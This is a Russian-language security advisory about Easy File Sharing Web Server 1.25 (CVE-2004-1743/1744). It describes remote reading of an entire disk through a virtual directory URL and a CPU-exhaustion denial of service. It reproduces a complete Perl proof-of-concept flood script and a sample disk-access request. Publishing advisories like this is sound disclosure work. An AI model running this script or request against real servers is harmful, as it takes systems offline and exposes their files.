Дата публикации: | 26.08.2004 |
Всего просмотров: | 1354 |
Опасность: | Средняя |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: |
CVE-2004-1743 CVE-2004-1744 |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Раскрытие важных данных Раскрытие системных данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | Easy File Sharing Web Server 1.x |
Уязвимые версии: Easy File Sharing Web Server 1.25
Описание: Несколько уязвимостей обнаружено в Easy File Sharing Web Server. Удаленный пользователь может просматривать файлы на системе. Удаленный пользователь может также вызвать отказ в обслуживании. Удаленный пользователь может представить специально обработанный запрос для виртуального имени директории для локального диска с:, чтобы просмотреть содержание всего диска. Пример: http://[target]/disk_cТакже сообщается, что удаленный пользователь может представить несколько больших HTTP запросов, чтобы заставить систему использовать 100 CPU. Пример/Эксплоит: #!/usr/bin/perl ##################################################### # Easy File Sharing Webserver v1.25 Denial Of Service # Proof Of Concept Code By GulfTech Security Research ##################################################### # Easy File Sharing Webserver v1.25 will consume 99% # of CPU usage until it crashes when sent large req's ##################################################### use IO::Socket; print "=====================================================\n". " Easy File Sharing Webserver v1.25 Denial Of Service \n". "=====================================================\n"; unless (@ARGV > 1) { die("usage: efswsdos.pl host port"); } my $remote_host = $ARGV[0]; my $remote_port = $ARGV[1]; my $done = "\015\012\015\012"; my $buff = "A" x 1000000; my $requested = $buff.$done; print "[*] DoS'ing Server $remote_host Press ctrl+c to stop\n"; while ($requested) { for (my $i=1; $i<10; $i++) { my $i = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $remote_host, PeerPort => $remote_port, Timeout => '10000', Type => SOCK_STREAM, ) || die("[*] The Server Has Been Killed!"); print $i $requested; $i->autoflush(1); } } close $remote; URL производителя: http://www.sharing-file.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |